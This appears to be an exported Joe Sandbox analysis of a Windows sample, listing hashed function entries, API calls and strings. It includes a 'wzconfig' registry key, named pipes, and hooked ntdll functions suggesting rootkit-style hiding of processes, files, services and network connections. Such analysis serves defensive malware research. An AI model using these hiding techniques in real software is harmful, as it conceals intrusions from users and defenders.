                                                                                                                                                                                                                                                • Instruction ID: a9fb9487e9124b5339b4971993124eccb23c8df1cffe08adb9e71cb46f02edba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e270e8593a71ad66ef089fadfa74d4cb038ffb7aa402265e75b4220792d44019
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B51C23670079089FB20DB76E84879E7BEBB744BD4F184116EE5827B99DE39D421C701
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 307302fee793cb47842d0b36a6f453d22f5a353d42adcd47c207e399357ec3df
                                                                                                                                                                                                                                                • Instruction ID: a5f12a0cbf99ecdc342060e23aae48439670c0b88216c137c755b42e3e386f85
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 307302fee793cb47842d0b36a6f453d22f5a353d42adcd47c207e399357ec3df
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8331B3FF54DBC54EF3934A7C896E6493F96ABA3E04B0EC056CB80421CBE6572C398651
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d120009e22b2c10b69ee1c7cf997a6593d570e53da93b21d446b083ea9a632e3
                                                                                                                                                                                                                                                • Instruction ID: 3f7575a97a60d055d46930a303f8ea74947eb859395f3bc81c78d6db3ca14e97
• Opcode Fuzzy Hash: d120009e22b2c10b69ee1c7cf997a6593d570e53da93b21d446b083ea9a632e3
• Instruction Fuzzy Hash: 31F062757242948EEBA8CF28E943B1977E5F348780F848419DA89C3B04D23DD070CF05
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\wzconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 106492572-440640706
• Opcode ID: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
• Instruction ID: 7995adddaed06be458973292db16e5af529c7160ceea08ac4839d996df2b57d6
• Opcode Fuzzy Hash: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
• Instruction Fuzzy Hash: 4B71423A310B508AEB10AF76E84869D376EF746B88F099111DD4E47B59EF36D878C340
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
• Instruction ID: 2dacda006e7eab409b77a1f78b26c79b6361b35e4d923956b73df3c972c0162a
• Opcode Fuzzy Hash: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
• Instruction Fuzzy Hash: BA51943A200B848AEB55CF66E54C35A77AAF78AFC5F088124DE4907718DF3DD469C700
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
• API String ID: 4175298099-1975688563
• Opcode ID: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
• Instruction ID: 20017e8feb68f2d950095fdd9f5197d0408cebef469e4c44c75bd6255b6ab6a6
• Opcode Fuzzy Hash: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
• Instruction Fuzzy Hash: BF31CD7C100A8EACEA09EB55E8597D4632FA745344F8CD413981906172DF7AEE7EC7A0
APIs
• GetLastError.KERNEL32 ref: 000002616F59D3A7
• FlsGetValue.KERNEL32(?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D3BC
• FlsSetValue.KERNEL32(?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D3DD
• FlsSetValue.KERNEL32(?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D40A
• FlsSetValue.KERNEL32(?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D41B
• FlsSetValue.KERNEL32(?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D42C
• SetLastError.KERNEL32 ref: 000002616F59D447
• FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D47D
• FlsSetValue.KERNEL32(?,?,00000001,000002616F59F23C,?,?,?,?,000002616F59C50F,?,?,?,?,?,000002616F597AC0), ref: 000002616F59D49C
  • Part of subcall function 000002616F59DC3C: HeapAlloc.KERNEL32 ref: 000002616F59DC91
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D4C4
  • Part of subcall function 000002616F59DCB4: HeapFree.KERNEL32 ref: 000002616F59DCCA
  • Part of subcall function 000002616F59DCB4: GetLastError.KERNEL32 ref: 000002616F59DCD4
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D4D5
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002616F5A0FDB,?,?,?,000002616F5A09CC,?,?,?,000002616F59CDBF), ref: 000002616F59D4E6
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: Value$ErrorLast$Heap$AllocFree
• String ID:
• API String ID: 570795689-0
• Opcode ID: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
• Instruction ID: e6be4582c1c7790624e7c790105313243c0dfeea310f1895f65e08188ece6160
• Opcode Fuzzy Hash: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
• Instruction Fuzzy Hash: 5641613C2006C88AF95CA725D56D36D628F5B467B0F1CC724AC7A076D7DE6ABC318600
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\wzchildproc32$\\.\pipe\wzchildproc64
• API String ID: 2171963597-1908187885
• Opcode ID: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
• Instruction ID: 1d44cde51dde2499cbd793102e51572d8d9aeb8e5208efdf455d5e1c063bce11
• Opcode Fuzzy Hash: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
• Instruction Fuzzy Hash: AA21C53A21474087F710CB25F40835A77A6F786BA4F448215DE5903BA8CF7DD9A9CF00
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction ID: 78c2e5b8e6cb2378f83bc25efeea12599041ee685a56b68c92ee8849f6735847
• Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction Fuzzy Hash: FCD1C37A604B408EEF60DF65E48839D77AAF745788F080117EF8957B99CB36E4A0C706
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction ID: 5ea085c38808bfdd1a88708ae1e88ade133760eb174250ac5f06833ed16194e3
• Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37D1147AA007C08EEB68DF24D44839D37BAF746788F088105EE8957B86CF35E8A0C750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                • Opcode ID: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction ID: d95c9582e578627c791a07792509256fb14a9ef44ed8d4376c2844f17db374da
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA41E33A311B805EFA5ACB26E80C79527DBB746BE0F4DD125AD0957784EB3AEC658300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 3743429067-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction ID: 10f5da8e496c9e34297fbddd7d2f6e010fd57b3cb8bb1b18d0e9abf332d64a12
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9418337214BC4DAE764CF21E44839E77AAF389B98F088115DB8907758DF39D89ACB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,000002616F59CD4E,?,?,?,?,?,?,?,?,000002616F59D50D,?,?,00000001), ref: 000002616F59D5F7
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000002616F59CD4E,?,?,?,?,?,?,?,?,000002616F59D50D,?,?,00000001), ref: 000002616F59D616
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000002616F59CD4E,?,?,?,?,?,?,?,?,000002616F59D50D,?,?,00000001), ref: 000002616F59D63E
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000002616F59CD4E,?,?,?,?,?,?,?,?,000002616F59D50D,?,?,00000001), ref: 000002616F59D64F
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000002616F59CD4E,?,?,?,?,?,?,?,?,000002616F59D50D,?,?,00000001), ref: 000002616F59D660
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID: 1%$Y%
                                                                                                                                                                                                                                                • API String ID: 3702945584-1395475152
                                                                                                                                                                                                                                                • Opcode ID: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction ID: da05403bb0eded14bd997136148c552751d1bcafc17a47e44d3677a3fa356f24
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF116338B042C489FA5C5722D569369628F5B467F0F1CC32468BD477D6DE2AFC228600
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: dd822430ca009dc190df4ddc95dc0ea58042227217f260eb7b887e03614529c6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A881F57C7002418EFA54EB26D44935926EFAB86780F4C9027AE05477DADB3BE8B5C703
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: 55fc23e27224eca235e220da2ea6cc2f4d9cc9c943196519d2a81a15fa018df3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A481C1386007818EFB58AB29F4593A9269FA787780F5CD0179D0943796EB3BED768700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                • Opcode ID: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction ID: c8fa7335d137f5f1714da9d2530d566be02a29c8eb32a3932cbdbf1a8eee4ccb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06314639702780D9EE5A8B42E408355279EF746BA0F5D8525DD1D0B380EF3BEC798310
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
• Instruction ID: ae1bb5767752e099d0f8283794a70c71f385c6a7e6803670e773abda6f4ed80e
• Opcode Fuzzy Hash: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
• Instruction Fuzzy Hash: 2311B235310B408AE3508B56F85831976A9F388FE4F088215EE6A877A4CF39DC788740
Similarity
• API ID: Heap$Process$Free
• String ID: C:\Users\user\Desktop\r8k29DBraE.exe
• API String ID: 3168794593-2002025803
• Opcode ID: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
• Instruction ID: 11ad6b47202d658abe99bc31435cf4e6b4f094c7c94a340b44e28909c7e876ce
• Opcode Fuzzy Hash: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
• Instruction Fuzzy Hash: 013161BF509BC08EE3578B69D8592492FAAF39AF40F0DC015DE4443247DA26A83A8740
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
• Instruction ID: 1cc8d5048ed1c234fa69c016be5dd5a49c99511bdc386ebf0a068b7f16618e1f
• Opcode Fuzzy Hash: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
• Instruction Fuzzy Hash: 8B116D3C2042C48AFA5CA725D66D32D629F6B467F4F1CC724AC76477DADE2AEC218740
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID:
• API String ID: 517849248-0
• Opcode ID: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
• Instruction ID: d93d11b5148e1052a343399212262d7f5824a205b14de5f7412693c1af655a03
• Opcode Fuzzy Hash: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
• Instruction Fuzzy Hash: BB016D35300B808AEB14DB16E45C35967AAF789BC0F488435DE5A43754DF3DDDAA8740
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
• Opcode ID: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
• Instruction ID: 317b7c029a5a94bc7ae351203d52ddc5272afa3e10eca254d47e894f2d1c0c54
• Opcode Fuzzy Hash: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
• Instruction Fuzzy Hash: 5B01807C6117448EFB259B25E81C31A37AABB4AB86F088024CD4D07764EF3ED979CB10
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
• Opcode ID: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
• Instruction ID: 61e2dc35a84047443eef843ddae7c60c380ff5f15506449f440bc123b5ade45a
• Opcode Fuzzy Hash: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
• Instruction Fuzzy Hash: 21F0C236300B809AEB208B64F5D8759676AF759B88F88C021DE4943954DF7EDEBDCB00
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
• Instruction ID: 0925981fd644e2039727158cb129a2ea9561925e4b4067967d00bf06e7a3cf89
• Opcode Fuzzy Hash: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
• Instruction Fuzzy Hash: 32F09679311B0585EF148B68F44C3595326FB86BA1F5C8219CDAA462E8CF3EE87CC310
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
• Opcode ID: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
• Instruction ID: 12d132362a35b3e3be6436785832f3ccd5d51974c088da4f0cae0c1182744019
• Opcode Fuzzy Hash: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
• Instruction Fuzzy Hash: 07F08238314B8085EA048B1BF91C119666AAB49FD0F0CC031EE5A47B18DF3DD8BA8700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: 233253c0af1c71537342ffad3d4117e803acd28c2e037e013065ef1ae825a821
                                                                                                                                                                                                                                                • Instruction ID: dd56751c3377d49462de0dfae5a81bfca469e7809adf0074a7c0a29b584a162a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 233253c0af1c71537342ffad3d4117e803acd28c2e037e013065ef1ae825a821
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A761713A119B84CAE764CB19F45831AB7E9F389784F189115FA8D43BA8DB3DD964CF00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: 8b53d4e254c11de1a8615dbf3dfa432433468a61b6f385beffc11875e7a12db1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9611063EA10A000DF665D168E84F369306F6F6A376F0C0330A976072EADA66A871C102
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: 2501108d79f3888e06cc71753b8c3f2d6112a41ecd5402b9c3db00c8cfa5aecd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3911823EA10B514AF65411E8E44E369115F7B593B8F1CD634ADB7076F6CE3AAC7D8200
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
